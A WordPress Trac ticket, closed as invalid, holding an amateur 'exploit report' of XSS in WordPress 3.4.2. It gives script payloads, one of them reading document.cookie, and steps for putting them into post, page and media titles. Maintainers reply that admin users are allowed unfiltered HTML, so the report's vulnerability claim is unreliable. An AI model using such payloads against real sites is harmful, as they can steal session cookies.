#21917 closed defect (bug) (invalid)
Wordpress 3.4.2 - Multiple XSS Vulnerability
Reported by: |
|
Owned by: | |
---|---|---|---|
Milestone: | Priority: | normal | |
Severity: | normal | Version: | 3.4.2 |
Component: | General | Keywords: | |
Focuses: | Cc: |
Description
[ Wordpress 3.4.2 - Multiple XSS Vulnerability ]
Hello, my name is Catur Febrian (nuxbie).
I have bugs at new webapps wordpress (last version).
This bugs is XSS (Cross Site Scripting).
Wordpress 3.4.2 have a multiple vuln.
- XSS WP-Post.
- XSS WP-Page.
- XSS WP-MediaLibrary.
Please, read my exploit report... :-)
Exploit Title: CMS Wordpress - Multiple XSS Vulnerability
Author : TheCyberNuxbie [ Catur Febrian ]
E-mail : root@…
Version CMS : Version 3.4.2 (Last Version)
Category : WebApps / Content Management System (CMS)
Security Risk: Medium Level
Link Downlaod: http://www.wordpress.org/
Tested On : Mozilla Firefox + Xampp + Windows 7 x32 ID
[ Information Content ]
WordPress - Web Publishing Software.
http://www.wordpress.org/
[ Vulnerability Details ]
- XSS WP-Post.
- XSS WP-Page.
- XSS WP-MediaLibrary.
[ XSS CODE ]
<script>alert('31337');</script>
<script>alert(document.cookie);</script>
<script>window.open("http://www.google.com/")</script>
- Exploit Report:
- Create / Edit WP-Post:
Input "Title Post" with Script XSS.
<script>alert('31337');</script>
http://wordpress/wp-admin/post-new.php <--- Publish.
View XSS: http://wordpress/?p=xxx <--- XSSed.
PIC: http://31337sec.com/wordpress/xss-post1.jpg + http://31337sec.com/wordpress/xss-post2.jpg
- Create / Edit WP-Page:
Input "Title Page" with Script XSS.
<script>alert('31337');</script>
http://wordpress/wp-admin/post-new.php?post_type=page <--- Publish.
View XSS: http://wordpress/?page_id=xxx <--- XSSed.
PIC: http://31337sec.com/wordpress/xss-page1.jpg + http://31337sec.com/wordpress/xss-page2.jpg
- Add / Edit WP-Media Library:
Upload files via Media Library.
http://wordpress/wp-admin/media-new.php <--- Select File.
Upload Files, Save...!!!
Input Form "Title", "Caption", "Description" with Script XSS <--- Save All Changes.
View XSS: http://wordpress/?attachment_id=xxx <--- XSSed.
PIC: http://31337sec.com/wordpress/xss-media1.jpg + http://31337sec.com/wordpress/xss-media2.jpg + http://31337sec.com/wordpress/xss-media3.jpg
- Script XSS will be affacted:
- Frontend Website (post).
http://wordpress/?p=xxx <--- XSSed.
- Frontend Website (page).
http://wordpress/?page_id=xxx <--- XSSed.
- Frontend Website (attachment).
http://wordpress/?attachment_id=xxx <--- XSSed.
Thanks...
TheCyberNuxbie
Please do not report "security issues" publicly. http://codex.wordpress.org/Security_FAQ#Where_do_I_report_security_issues.3F
Also , this isn't a security issue. http://codex.wordpress.org/Security_FAQ#Why_are_some_users_allowed_to_post_unfiltered_HTML.3F
If you posted this publicly anywhere else (exploit sites, disclosure mailing lists) please rescind it as invalid.
We encourage responsible, private disclosure of security issues in part so invalid reports do not spread.